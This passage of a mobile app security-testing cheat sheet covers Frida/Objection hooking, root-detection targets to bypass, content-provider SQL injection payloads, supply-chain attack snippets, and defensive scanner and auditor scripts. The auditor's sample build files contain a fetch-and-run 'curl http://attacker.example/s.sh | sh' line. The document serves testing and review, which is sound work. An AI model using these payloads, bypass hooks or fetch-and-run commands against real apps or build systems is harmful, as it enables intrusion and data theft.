      // Log the arguments passed to the method
      console.log("[+] Hostname: " + hostname);
      console.log("[+] Certificates presented: " + peerCertificates.size());
      // Call through so the pin check still runs; the bypass script above
      // simply returns here instead.
      this.check(hostname, peerCertificates);
    };
});
```
Sample Objection Command:
```sh
# Start objection against the target package and load a Frida script at startup
objection --gadget "com.example.app" explore --startup-script "path/to/frida_script.js"
```
Root Detection
| ID | Function/Library Name | Popularity |
|----|-----------------------|------------|
| 1 | java.lang.Runtime.exec (Android - Magisk Detection) | High |
| 2 | java.io.File.exists (Android - Superuser.apk Detection) | High |
| 3 | com.scottyab.rootbeer.RootBeer.isRooted (Android - RootBeer Library) | High |
| 4 | java.io.File.canExecute (Android - Su Binary Detection) | High |
| 5 | java.io.File.exists (Android - BusyBox Detection) | High |
| 6 | Foundation.fileExistsAtPath (iOS - Jailbreak Detection) | High |
| 7 | Foundation.fileExistsAtPath (iOS - Cydia Detection) | High |
| 8 | Foundation.fileExistsAtPath (iOS - SSH Daemon Detection) | High |
| 9 | Foundation.fileExistsAtPath (iOS - MobileSubstrate Detection) | High |
| 10 | Foundation.sandboxed (iOS - App Sandbox Integrity Check) | High |
| 11 | java.lang.System.getenv (Android - Environment Variable Detection) | Medium |
| 12 | android.os.Build.PRODUCT (Android - Build Properties Detection) | Medium |
| 13 | java.lang.Class.forName (Android - Class Loading Detection) | Medium |
| 14 | com.scottyab.rootbeer.RootBeer.checkForDangerousProps (Android - RootBeer Library) | Medium |
| 15 | android.os.Debug.isDebuggerConnected (Android - Debugger Detection) | Medium |
| 16 | java.io.File.listRoots (Android - Root Filesystem Detection) | Medium |
| 17 | Foundation.fileExistsAtPath (iOS - Symbolic Link Detection) | Medium |
| 18 | System.loadLibrary (Android - Native Library Loading Detection) | Medium |
| 19 | com.scottyab.rootbeer.RootBeer.checkForSuBinary (Android - RootBeer Library) | Low |
| 20 | com.scottyab.rootbeer.RootBeer.detectTestKeys (Android - RootBeer Library) | Low |
Below are the top 10 libraries and function names commonly hooked with Frida and Objection to bypass root detection in Android and iOS applications:
Top 10 Libraries and Functions for Root Detection Bypass
Android:
- Magisk Detection (Android): library java.lang.Runtime; function: exec
- Superuser.apk Detection (Android): library java.io.File; function: exists
- RootBeer Library (Android): library com.scottyab.rootbeer.RootBeer; function: isRooted
- Su Binary Detection (Android): library java.io.File; function: canExecute
- BusyBox Detection (Android): library java.io.File; function: exists
iOS:
- Jailbreak Detection (iOS): library Foundation; function: fileExistsAtPath
- Cydia Detection (iOS): library Foundation; function: fileExistsAtPath
- SSH Daemon Detection (iOS): library Foundation; function: fileExistsAtPath
- MobileSubstrate Detection (iOS): library Foundation; function: fileExistsAtPath
- App Sandbox Integrity Check (iOS): library Foundation; function: sandboxed
Insecure Logging
Below are the sources of insecure logging in Android and iOS applications, covering both native and third-party logging frameworks:
Android:
Logcat (Native Android Logging):
- Command:
```sh
adb logcat
```
- Filtering by Priority Level:
Command: Filter logs by priority level (V, D, I, W, E, F, S).
Example: Show logs at priority level W (Warning) or higher, together with all logs from the tag MyApp
```sh
adb logcat *:W MyApp:*
```
- Filtering by Keyword:
Command: Filter logs by a specific keyword in the message.
Example: Show logs containing the keyword error
```sh
adb logcat | grep -i error
```
- Filtering by Application Name:
Command: Filter logs by the name of the application package.
Example: Show logs for the application with package name com.example.app
```sh
adb logcat | grep com.example.app
```
- Continuous Logging:
Command: Continuously stream logs, updating in real time.
Example: Continuously stream logs in the time output format
```sh
adb logcat -v time
```
- Filtering by Process ID (PID):
Command: Filter logs by a specific process ID.
Example: Show logs for process ID 12345
```sh
adb logcat --pid=12345
```
iOS:
NSLog (Native iOS Logging):
- Command: Not applicable (logging output visible in Xcode Console or retrieved from the device)
NSLog (Native iOS Logging):
- Command: Not applicable (logging output visible in Xcode Console or retrieved from the device)
NSLog(@"Message: %@", variable);
- OSLog (Native iOS Logging):
- Command: Not applicable (logging output visible in Xcode Console or retrieved from the device)
os_log(OS_LOG_DEFAULT, "Message: %@", variable);
Insecure Storage
Common sources of insecure storage in Android and iOS applications, including both native APIs and common third-party libraries. In each case the test is the same: pull the artefact from the device (adb pull, or objection's file download) and check whether the value is readable without the app's help.
Android:
Insecure SharedPreferences (Native Android):
Command: Not applicable (accessed programmatically); the backing file is /data/data/<package>/shared_prefs/my_prefs.xml
Code: Accessing SharedPreferences without encryption (values are stored as plaintext XML; MODE_PRIVATE only keeps other apps out, not a rooted device or a backup)
SharedPreferences prefs = getSharedPreferences("my_prefs", Context.MODE_PRIVATE);
String secret = prefs.getString("secret_key", "");
- Insecure SQLite Database (Native Android):
Command: Not applicable (accessed programmatically); databases live under /data/data/<package>/databases/
Code: Opening an SQLite database without encryption (rows can be read with sqlite3 once the file is pulled)
SQLiteDatabase db = dbHelper.getWritableDatabase();
- Insecure File Storage (Native Android):
Command: Not applicable (accessed programmatically); external storage is readable by any app holding the storage permission, and world-readable on older API levels
Code: Writing sensitive data to external storage
File file = new File(Environment.getExternalStorageDirectory(), "data.txt");
FileOutputStream fos = new FileOutputStream(file);
fos.write(secret.getBytes());
fos.close();
iOS:
Insecure UserDefaults (Native iOS):
Command: Not applicable (accessed programmatically); the store is Library/Preferences/<bundle id>.plist inside the app container and is included in backups
Code: Accessing UserDefaults without encryption
let defaults = UserDefaults.standard
let secret = defaults.string(forKey: "secret_key") ?? ""
- Insecure Keychain (KeychainAccess third-party wrapper):
Command: Not applicable (accessed programmatically)
Code: Storing a secret in the Keychain without an explicit accessibility class. The wrapper's default (afterFirstUnlock) keeps the item readable while the device is locked after its first unlock and lets it migrate to another device via backup; whenUnlockedThisDeviceOnly is the stricter choice for credentials
let keychain = Keychain(service: "com.example.myapp")
try keychain.set("password", key: "user_password")
// Stricter: try keychain.accessibility(.whenUnlockedThisDeviceOnly).set("password", key: "user_password")
- Insecure File Storage (Native iOS):
Command: Not applicable (accessed programmatically)
Code: Writing sensitive data to the local file system without a Data Protection class (compare the .completeFileProtection writing option)
let data = "sensitive_data".data(using: .utf8)!
try data.write(to: URL(fileURLWithPath: "/path/to/file.txt"))
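A scanner for the two Android artefacts from the logging and storage sections above (a logcat dump and a pulled shared_prefs file). This is an added example, not code from the original page or from any tool it names; the sample log lines and preferences file are constructed, and the detector patterns and the list of sensitive key names are assumptions to tune per engagement. Matches are redacted before they are reported so the report does not become a second copy of the secret.

```javascript
// Added example (not from the original page): scan a pulled logcat dump and a
// shared_prefs XML file for values that must never be logged or stored in plaintext,
// and redact them before reporting so the report itself does not leak. The sample
// log lines and preferences file below are constructed for this example.
const LOGCAT_TIME_RE = /^(\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})\s+([VDIWEFS])\/(.*?)\(\s*(\d+)\):\s?(.*)$/;

// Parse one `adb logcat -v time` line; returns null for lines in another format.
function parseLogcatLine(line) {
  const m = LOGCAT_TIME_RE.exec(line);
  return m ? { time: m[1], level: m[2], tag: m[3], pid: Number(m[4]), message: m[5] } : null;
}

// Luhn check: separates card numbers from other 13-19 digit runs (request ids, timestamps).
function luhnValid(digits) {
  let sum = 0, dbl = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (dbl) { d *= 2; if (d > 9) d -= 9; }
    sum += d; dbl = !dbl;
  }
  return digits.length >= 13 && sum % 10 === 0;
}

const first = (s, re, group) => { const m = re.exec(s); return m ? m[group] : null; };

// Each detector returns the matched secret (or null) so it can be redacted in the report.
const DETECTORS = [
  { kind: 'bearer_token', find: (s) => first(s, /Bearer\s+([A-Za-z0-9._~+\/=-]{16,})/, 1) },
  { kind: 'jwt', find: (s) => first(s, /\beyJ[A-Za-z0-9_-]+\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/, 0) },
  { kind: 'credential', find: (s) => first(s, /\b(?:password|passwd|pwd|secret|api[_-]?key|token)\s*[=:]\s*["']?([^\s"',;]+)/i, 1) },
  { kind: 'pan', find: (s) => {
      const re = /\b(?:\d[ -]?){12,18}\d\b/g;
      for (let m; (m = re.exec(s)) !== null;) if (luhnValid(m[0].replace(/[ -]/g, ''))) return m[0];
      return null;
    } },
];

// Run every detector over one piece of text; report the kinds found plus a redacted copy.
function classify(text) {
  const kinds = [];
  let redacted = text;
  for (const d of DETECTORS) {
    const hit = d.find(text);
    if (hit) { kinds.push(d.kind); redacted = redacted.split(hit).join('[REDACTED]'); }
  }
  return { kinds, redacted };
}

function scanLogcat(text) {
  const findings = [];
  text.split('\n').forEach((line, i) => {
    const e = parseLogcatLine(line);
    if (!e) return;
    const { kinds, redacted } = classify(e.message);
    if (kinds.length) findings.push({ line: i + 1, tag: e.tag, pid: e.pid, level: e.level, kinds, redacted });
  });
  return findings;
}

// Minimal parser for shared_prefs XML: <string name="k">v</string> and <type name="k" value="v"/>.
function parseSharedPrefs(xml) {
  const re = /<(string|int|long|float|boolean)\s+name="([^"]*)"(?:\s+value="([^"]*)")?\s*(?:\/>|>([\s\S]*?)<\/\1>)/g;
  const entries = [];
  for (let m; (m = re.exec(xml)) !== null;) {
    entries.push({ type: m[1], name: m[2], value: m[3] !== undefined ? m[3] : (m[4] || '') });
  }
  return entries;
}

const SENSITIVE_KEY_RE = /password|passwd|secret|token|api[_-]?key|session|auth/i;

function scanSharedPrefs(xml) {
  const findings = [];
  for (const e of parseSharedPrefs(xml)) {
    const { kinds, redacted } = classify(e.value);
    let shown = redacted;
    // A sensitive key name is a finding even when the value matches no pattern (e.g. a random session id).
    if (SENSITIVE_KEY_RE.test(e.name) && e.value !== '') { kinds.push('sensitive_key_name'); shown = '[REDACTED]'; }
    if (kinds.length) findings.push({ name: e.name, type: e.type, kinds, redacted: shown });
  }
  return findings;
}

// Constructed sample input (not captured from a real device).
const SAMPLE_LOGCAT = [
  '01-15 10:22:31.104 D/MyApp( 4242): login ok user=alice password=Hunter2!',
  '01-15 10:22:31.220 I/OkHttp( 4242): Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbGljZSJ9.5mhBHqs5_DTLdINd9p5m7ZJ6XD0Xc55kIaCRY5r6HRk',
  '01-15 10:22:32.003 W/MyApp( 4242): card on file 4111 1111 1111 1111 expires 12/27',
  '01-15 10:22:32.010 D/MyApp( 4242): cache hit for /api/v1/profile',
  '01-15 10:22:32.011 D/MyApp( 4242): request id 1234567890123456 (not a card number)',
].join('\n');
const SAMPLE_PREFS = `<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="username">alice</string>
    <string name="session_token">eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbGljZSJ9.5mhBHqs5_DTLdINd9p5m7ZJ6XD0Xc55kIaCRY5r6HRk</string>
    <boolean name="onboarding_done" value="true" />
    <string name="card_on_file">4111111111111111</string>
    <int name="launch_count" value="7" />
</map>`;

console.log(JSON.stringify({ logcat: scanLogcat(SAMPLE_LOGCAT), shared_prefs: scanSharedPrefs(SAMPLE_PREFS) }, null, 2));
```

To run it over real artefacts, capture with adb logcat -d -v time > app.log and adb pull /data/data/<package>/shared_prefs/<name>.xml, read both files with fs.readFileSync and pass the text to scanLogcat and scanSharedPrefs. The Luhn check is what keeps request ids and timestamps out of the card-number findings; the last sample line is there to show that a 16-digit run alone is not enough.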
Content Provider
Content Providers can lead to unauthorized access and data leakage in Android applications. iOS has no Content Provider equivalent; the closest analogue is the system data stores (Contacts, Photos, Calendar) that apps reach through usage-description-gated frameworks, which is what the iOS items below cover. The commands below are the usual starting points:
Android:
SQL Injection Attack (Selection Injection) (Native Android):
- Command: Inject SQL into the selection argument. The provider typically builds "... WHERE (<selection>)" from it, so a tautology returns every row. The same payload from the shell: adb shell content query --uri content://com.example.provider/items --where "1 OR 1=1"
String maliciousSelection = "1 OR 1=1";
Cursor cursor = getContentResolver().query(uri, projection, maliciousSelection, selectionArgs, sortOrder);
Unauthorized Data Access (Native Android):
- Command: Query the Content Provider from a third-party app that holds none of the permissions the provider should require (works only when the provider is exported and unprotected).
Cursor cursor = getContentResolver().query(uri, projection, selection, selectionArgs, sortOrder);
Excessive Data Leakage (Native Android):
- Command: Query all columns and all rows without any filtering (null projection and null selection).
Cursor cursor = getContentResolver().query(uri, null, null, null, null);
Exported Content Provider (AndroidManifest.xml) (Native Android):
- Command: Check whether the Content Provider is exported and whether android:permission, android:readPermission or android:writePermission protect it. When android:exported is absent, the default is true for apps whose minSdkVersion or targetSdkVersion is 16 or lower.
<provider
    android:name=".MyContentProvider"
    android:authorities="com.example.provider"
    android:exported="true"/>
SQL Injection Attack (Projection Injection) (Native Android):
- Command: Inject into the projection. The projection is pasted verbatim after SELECT, so a payload that closes the column list and comments out the rest of the statement reads an arbitrary table (here the schema). From the shell: adb shell content query --uri content://com.example.provider/items --projection "* FROM sqlite_master--"
String[] maliciousProjection = {"* FROM sqlite_master--"};
Cursor cursor = getContentResolver().query(uri, maliciousProjection, selection, selectionArgs, sortOrder);
iOS:
Unauthorized Data Access (Native iOS):
- Command: Access CNContactStore. The call throws unless the user has granted the app Contacts access, so the finding is an app that requests (and retains) more than it needs, not a bypass.
let store = CNContactStore()
let keysToFetch = [CNContactGivenNameKey as CNKeyDescriptor]
let predicate = CNContact.predicateForContacts(matchingName: "John")
do {
    let contacts = try store.unifiedContacts(matching: predicate, keysToFetch: keysToFetch)
} catch {
    print("Error accessing contacts: \(error)")
}
Excessive Data Leakage (Native iOS):
- Command: Enumerate every contact without a predicate. A CNContactFetchRequest is consumed with enumerateContacts(with:), not with unifiedContacts(matching:), which takes a predicate.
let store = CNContactStore()
let keysToFetch = [CNContactGivenNameKey as CNKeyDescriptor]
let request = CNContactFetchRequest(keysToFetch: keysToFetch)
do {
    try store.enumerateContacts(with: request) { contact, _ in
        print(contact.givenName)
    }
} catch {
    print("Error accessing contacts: \(error)")
}
Usage Description (Info.plist) (Native iOS):
- Command: Check that NSContactsUsageDescription is present and that its wording matches what the app actually does with the data; without the key the app is terminated on first access instead of prompting.
<key>NSContactsUsageDescription</key>
<string>We need access to contacts for better user experience</string>
Data Modification (Native iOS):
- Command: Create or modify contacts. A new CNMutableContact is added with add(_:toContainerWithIdentifier:); update(_:) is for contacts previously fetched from the store.
let store = CNContactStore()
let contact = CNMutableContact()
contact.givenName = "Jane"
let saveRequest = CNSaveRequest()
saveRequest.add(contact, toContainerWithIdentifier: nil)
do {
    try store.execute(saveRequest)
} catch {
    print("Error updating contact: \(error)")
}
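The Android payloads above only make sense once you see the SQL the provider assembles. The following is an added example, not code from the original page or from Android: a simplified model of how SQLiteQueryBuilder joins the caller's projection and selection into a statement, a hardened variant that validates the projection against an allow-list and ignores the caller's selection, and the manifest default that makes a provider reachable without any android:exported attribute. The table, columns, authority and the note store are placeholders.

```javascript
// Added example (not from the original page): a simplified model of how Android's
// SQLiteQueryBuilder assembles a provider query from the caller-controlled projection
// and selection, showing why the payloads above work and how a projection map stops
// them. The table, columns and authority are placeholders.

// Mirrors SQLiteQueryBuilder.buildQuery(): the projection is joined with ", " straight
// after SELECT and the selection is wrapped in parentheses after WHERE. (Simplified:
// no DISTINCT, GROUP BY, HAVING or LIMIT handling.)
function buildQuery(table, projection, selection) {
  const columns = projection && projection.length ? projection.join(', ') : '*';
  let sql = 'SELECT ' + columns + ' FROM ' + table;
  if (selection) sql += ' WHERE (' + selection + ')';
  return sql;
}

// Vulnerable provider: forwards the caller's projection and selection unchanged.
function vulnerableProviderQuery(projection, selection) {
  return buildQuery('notes', projection, selection);
}

// Hardened provider: every projection entry must be a key of the projection map
// (SQLiteQueryBuilder.setProjectionMap() rejects anything else with
// IllegalArgumentException("Invalid column ...")) and the caller's selection is
// ignored in favour of a fixed, parameterised clause bound to the calling user.
const PROJECTION_MAP = { _id: '_id', title: 'title', body: 'body' };

function hardenedProviderQuery(projection, ownerId) {
  const requested = projection && projection.length ? projection : Object.keys(PROJECTION_MAP);
  const columns = requested.map((c) => {
    if (!Object.prototype.hasOwnProperty.call(PROJECTION_MAP, c)) throw new Error('Invalid column ' + c);
    return PROJECTION_MAP[c];
  });
  return { sql: buildQuery('notes', columns, 'owner_id = ?'), args: [String(ownerId)] };
}

// Manifest check: an absent android:exported defaults to true when either minSdkVersion
// or targetSdkVersion is 16 or lower, so "no exported attribute" is not "not exported".
// (path-permission elements are not modelled here.)
function providerIsReachableByOtherApps(providerAttrs, minSdk, targetSdk) {
  const exported = providerAttrs.exported === undefined
    ? (minSdk <= 16 || targetSdk <= 16)
    : providerAttrs.exported === 'true';
  const guarded = Boolean(providerAttrs.permission || providerAttrs.readPermission || providerAttrs.writePermission);
  return exported && !guarded;
}

// The payloads from the section above, as they are sent from a shell:
//   adb shell content query --uri content://com.example.provider/notes --where "1 OR 1=1"
//   adb shell content query --uri content://com.example.provider/notes --projection "* FROM sqlite_master--"
const SELECTION_PAYLOAD = '1 OR 1=1';
const PROJECTION_PAYLOAD = ['* FROM sqlite_master--'];

// What each provider builds for a normal request and for both payloads.
function demo() {
  const rows = [
    ['normal', vulnerableProviderQuery(['_id', 'title'], 'owner_id = 7')],
    ['selection payload', vulnerableProviderQuery(['_id', 'title'], SELECTION_PAYLOAD)],
    ['projection payload', vulnerableProviderQuery(PROJECTION_PAYLOAD, 'owner_id = 7')],
    ['hardened, normal', hardenedProviderQuery(['_id', 'title'], 7).sql],
  ];
  try {
    hardenedProviderQuery(PROJECTION_PAYLOAD, 7);
  } catch (e) {
    rows.push(['hardened, projection payload', 'rejected: ' + e.message]);
  }
  return rows;
}

for (const [label, sql] of demo()) console.log(label.padEnd(30) + sql);
```

The projection payload works because SQLite treats everything after -- as a comment, so "SELECT * FROM sqlite_master-- FROM notes WHERE (...)" executes as a dump of the schema table. The parenthesised selection is why "1 OR 1=1" survives being ANDed with any fixed clause the provider prepends: the tautology is evaluated inside its own group.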
Inadequate Supply Chain Security
Inadequate supply chain security can lead to various attacks on Android and iOS applications, compromising the integrity and security of the software distribution process. The snippets below show what each attack looks like in the build files, which is also where to look for it during a review (the library names and malicious_command are placeholders):
Android:
Dependency Hijacking (Android):
- Command: Replace a legitimate dependency with, or add, a look-alike package served from an attacker-controlled repository. Dynamic versions (2.+, latest.release) and unpinned repositories make the swap silent.
implementation 'com.example:malicious-library:1.0.0'
Malicious SDK Integration (Android):
- Command: Integrate a malicious SDK into the application. A pinned version does not make a third-party SDK trustworthy; review what it does at runtime.
implementation 'com.example:malicious-sdk:1.0.0'
Compromised Build Systems (Android):
- Command: Append Groovy to build.gradle on a compromised build host; anything at the top level of the script runs during the configuration phase of every build.
echo "println 'malicious code executed at build time'" >> build.gradle
Code Injection via Build Scripts (Android):
- Command: Inject an exec block so the build script runs an arbitrary command on the build machine.
exec {
    commandLine 'bash', '-c', 'malicious_command'
}
iOS:
Dependency Hijacking (iOS):
- Command: Replace or add a dependency in the Podfile; an unversioned pod resolves to whatever the spec repository currently serves.
pod 'MaliciousLibrary'
Malicious Framework Integration (iOS):
- Command: Integrate a malicious framework into the application target.
target 'MyApp' do
  pod 'MaliciousFramework'
end
Compromised Build Systems (iOS):
- Command: Append Ruby to the Podfile on a compromised build host; the Podfile is executed by pod install.
echo "system('malicious_command')" >> Podfile
Code Injection via Build Scripts (iOS):
- Command: Inject a post_install hook so pod install runs an arbitrary command.
post_install do |installer|
  system 'malicious_command'
end
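The review-time counterpart of the attacks above: a script that reads a Gradle build script and a Podfile and flags the declarations that enable them (unversioned or dynamic versions, packages outside an approved group list, plain-HTTP repositories, and command execution inside the build). This is an added example, not code from the original page or from Gradle or CocoaPods; the approved-group list, both sample files and every host name in them are constructed for the example.

```javascript
// Added example (not from the original page): a review-time audit of a Gradle build
// script and a Podfile for the supply-chain weaknesses above: unpinned or dynamic
// versions, unapproved package groups, plain-HTTP repositories and build-time command
// execution. The approved-group list and both sample files are constructed for the example.

// Hypothetical allow-list of dependency groups the team has vetted.
const APPROVED_GROUPS = ['com.squareup.okhttp3', 'androidx', 'com.google.android'];
const groupApproved = (g) => APPROVED_GROUPS.some((p) => g === p || g.startsWith(p + '.'));

const GRADLE_DEP_RE = /^\s*(?:implementation|api|compileOnly|runtimeOnly|classpath|kapt|annotationProcessor|testImplementation)\s*\(?\s*['"]([^'"]+)['"]/;
const GRADLE_EXEC_RE = /\bexec\s*\{|\bcommandLine\b|\bProcessBuilder\b|Runtime\.getRuntime\(\)\.exec|\.execute\(\)/;

function auditGradle(text) {
  const findings = [];
  text.split('\n').forEach((line, i) => {
    const add = (rule, detail) => findings.push({ line: i + 1, rule, detail });
    const dep = GRADLE_DEP_RE.exec(line);
    if (dep) {
      const [group, , version] = dep[1].split(':');
      if (!groupApproved(group)) add('unapproved_group', dep[1]);
      if (version === undefined) add('unversioned_dependency', dep[1]);
      else if (/\+|latest\.(?:release|integration)|^[\[(]/.test(version)) add('dynamic_version', dep[1]);
      else if (/-SNAPSHOT$/.test(version)) add('snapshot_version', dep[1]);
    }
    if (/\burl\s*(?:=|\()?\s*['"]http:\/\//.test(line)) add('plain_http_repository', line.trim());
    if (GRADLE_EXEC_RE.test(line)) add('build_time_command_execution', line.trim());
  });
  return findings;
}

const POD_RE = /^\s*pod\s+['"]([^'"]+)['"]\s*(?:,\s*(.*))?$/;
const RUBY_EXEC_RE = /\bsystem\b|\bexec\b|`|%x\(|IO\.popen|Open3/;

function auditPodfile(text) {
  const findings = [];
  text.split('\n').forEach((line, i) => {
    const add = (rule, detail) => findings.push({ line: i + 1, rule, detail });
    const pod = POD_RE.exec(line);
    if (pod) {
      const rest = pod[2] || '';
      if (/:git\s*=>/.test(rest)) {
        // A git source is only reproducible when pinned to a commit, not a branch or tag.
        if (!/:commit\s*=>/.test(rest)) add('git_source_without_commit', pod[1]);
      } else if (!/:(?:path|podspec)\s*=>/.test(rest)) {
        const version = /['"]([^'"]+)['"]/.exec(rest);
        if (!version) add('unversioned_pod', pod[1]);
        else if (/^[~><=]/.test(version[1].trim())) add('version_range', pod[1] + ' ' + version[1]);
      }
    }
    if (/^\s*source\s+['"]http:\/\//.test(line)) add('plain_http_source', line.trim());
    if (RUBY_EXEC_RE.test(line)) add('build_time_command_execution', line.trim());
  });
  return findings;
}

const countByRule = (findings) => findings.reduce((acc, f) => ({ ...acc, [f.rule]: (acc[f.rule] || 0) + 1 }), {});

// Constructed sample files (library names and hosts are placeholders).
const SAMPLE_GRADLE = [
  "plugins { id 'com.android.application' }",
  'repositories {',
  '    mavenCentral()',
  "    maven { url 'http://repo.example.internal/maven' }",
  '}',
  'dependencies {',
  "    implementation 'com.squareup.okhttp3:okhttp:4.12.0'",
  "    implementation 'com.example:malicious-library:1.0.0'",
  "    implementation 'com.example:analytics-sdk:2.+'",
  "    implementation 'com.example:unpinned-sdk'",
  "    api 'com.example:dev-sdk:3.1.0-SNAPSHOT'",
  '}',
  'exec {',
  "    commandLine 'bash', '-c', 'curl http://attacker.example/s.sh | sh'",
  '}',
].join('\n');
const SAMPLE_PODFILE = [
  "source 'http://cdn.example.internal/specs'",
  "platform :ios, '15.0'",
  "target 'MyApp' do",
  "  pod 'Alamofire', '5.8.1'",
  "  pod 'MaliciousFramework'",
  "  pod 'Charts', '~> 4.1'",
  "  pod 'InternalKit', :git => 'https://git.example.internal/internalkit.git'",
  'end',
  'post_install do |installer|',
  "  system 'curl http://attacker.example/s.sh | sh'",
  'end',
].join('\n');

console.log(JSON.stringify({ gradle: countByRule(auditGradle(SAMPLE_GRADLE)), podfile: countByRule(auditPodfile(SAMPLE_PODFILE)) }, null, 2));
```

The pinned but unapproved com.example:malicious-library line is deliberately in the sample: a version pin proves reproducibility, not provenance, which is why the group allow-list is a separate rule. Run it over real files by reading them with fs.readFileSync and passing the text to auditGradle and auditPodfile.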
Static Scanner
ID | Tool | Usage Features | Popularity |
1 | MobSF (Mobile Security Framework) | Static and dynamic analysis, API testing, SSL/TLS verification, data storage security checks, and more. | High |
2 | QARK (Quick Android Review Kit) | Static analysis for Android applications, vulnerability detection, insecure logging, cryptography issues, and more. | High |
3 | AndroBugs Framework | Static analysis tool for Android applications, identifying security vulnerabilities such as SQL injection, insecure data storage, and more. | Medium |
4 | Appknox | Automated security testing for Android and iOS apps, identifying vulnerabilities like OWASP Top 10, insecure data storage, and more. | Medium |
5 | Checkmarx | Static application security testing (SAST), identifying security vulnerabilities in code, including OWASP Top 10, insecure data storage, and more. | High |
6 | Veracode Mobile Security Testing | Automated security testing for Android and iOS applications, including static and dynamic analysis, identifying vulnerabilities, and more. | High |
7 | NowSecure Lab | Automated mobile app security testing, identifying vulnerabilities, insecure data storage, SSL/TLS issues, and more. | Medium |
8 | Fortify Static Code Analyzer | Static analysis tool for identifying security vulnerabilities in code, including OWASP Top 10, insecure data storage, and more. | High |
9 | Kryptowire | Automated security testing for Android and iOS applications, including static and dynamic analysis, identifying vulnerabilities, and more. | Medium |
10 | ZAP (Zed Attack Proxy) | Dynamic application security testing (DAST) proxy for the web services a mobile app talks to: traffic interception, active scanning, SSL/TLS issues. Not a static scanner and does not see on-device data storage. | High |
Resources
SANS FOR585
SANS GMOB